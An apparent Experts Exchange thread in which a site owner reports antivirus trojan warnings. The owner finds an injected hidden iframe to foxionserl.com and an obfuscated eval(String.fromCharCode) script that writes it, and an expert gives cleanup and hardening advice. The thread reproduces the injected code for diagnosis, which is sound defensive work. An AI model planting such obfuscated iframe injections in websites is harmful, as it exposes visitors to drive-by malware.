Link to home
Start Free TrialLog in
Avatar of oh_maestro
oh_maestro

asked on

Help! My website is causing browsers to get HTML:IFrame-EE Trojan! and Mal/EncPk-F & Mal/HckPk-A also

I have a web site (I will give you the URL if someone says it is OK) in which I've had a couple browsers get this message from AVAST:
HTML:IFrame-EJ [trj]
Type: Trojan Horse

I also have once gotten the malware Mal/EncPk-F and Mal/HckPk-A (Sophos Anti-Virus) when visiting the site.

My hosting is through Go Daddy, and they insist there is no virus or trojan on their end.

Don't get me wrong - the website usually works without a problem; but we are getting ready to promote the website & I don't want any hint of malware coming to my site.

My site is on a UNIX server and I am using PHP & MySQL. I am using sessions on every page.
ASKER CERTIFIED SOLUTION
Avatar of Rich Rumble
Rich Rumble
Flag of United States of America image

Link to home
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
Start Free Trial
SOLUTION
Link to home
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
Start Free Trial
Avatar of oh_maestro
oh_maestro

ASKER

hxxp://www.openhousesohio.com

Using Firebug, I found this:
<iframe height="3" width="1" src="http://foxionserl.com/">
 and this
<script type="text/javascript">
eval(String.fromCharCode(118,97,114,32,120,101,119,61,57,56,55,49,51,49,49,59,118,97,114,32,103,104,103,52,53,61,34,102,111,120,105,34,59,118,97,114,32,119,61,34,111,110,34,59,118,97,114,32,114,101,54,61,34,115,101,114,108,46,34,59,118,97,114,32,104,50,104,61,34,99,111,109,34,59,118,97,114,32,97,61,34,105,102,114,34,59,118,97,114,32,115,61,34,104,116,116,34,59,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,39,43,97,43,39,97,109,101,32,115,114,39,43,39,99,61,34,39,43,115,43,39,112,58,47,47,39,43,103,104,103,52,53,43,39,39,43,119,43,39,39,43,114,101,54,43,39,39,43,104,50,104,43,39,47,39,43,39,34,32,119,105,100,39,43,39,116,104,61,34,49,34,32,104,39,43,39,101,105,103,104,116,61,34,51,34,62,60,47,105,102,39,43,39,114,97,109,101,62,39,41,59,32,102,117,110,99,116,105,111,110,32,100,40,41,123,118,97,114,32,115,61,52,51,52,53,59,125,32,118,97,114,32,114,114,101,61,56,56,50,56,51,56,50))

I did not type any of this code.

I do not see this code when I go to View+Source in IE. I also do not see anything like this on my code.
My main editor is Macromedia Dreamweaver MX 2004, and I have to FTP files to my GoDaddy account. I am using PHP 4.

Has my site been hacked?
Increasing Pts!
SOLUTION
Link to home
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
Start Free Trial
PHP4 is pretty old, you should upgrade if possible. There were several SQL injection attacks against that version of DW, make sure it's patched and updated: http://secunia.com/advisories/product/3194/?task=advisories
Find anything that is not yours on your server, and clean it out. Then chmod 644 every directory that does not need write access. Is this a godaddy server? they should provide more up to date instances of PHP.

http://www.UnmaskParasites.com/security-report/?page=openhousesohio.com
http://www.google.com/safebrowsing/diagnostic?site=openhousesohio.com
https://www.google.com/accounts/ServiceLoginAuth?service=sitemaps
http://www.directadmin.com/forum/showthread.php?p=157818
-rich
I think your login form needs sanitization, download xss-me and sql-inject-me firefox extentions. Go to your login page, right click and select "open xss me sidebar" or the sql-inject me side bar, run all tests.
Read up on input validation/sanitization, xss and sql injection: http://shiflett.org/articles
I think he wrote and developed mysql_real_escape_string for php: http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string
http://code.google.com/p/inspekt/
-rich
The long Javascript code at the end was the culprit. Someone had hacked into my website and put that at the bottom of the page. I was able to get it removed from my site, and I have a whole new list of tougher passwords.
Thanks!
Glad to help, and beyond password choices input validation is a must to avoid sql injection. The site looks solid from a xss point of view, but sql injection on your login form could be worse.
Good luck!
-rich
Thats good stuff! Thanks for the feedback :)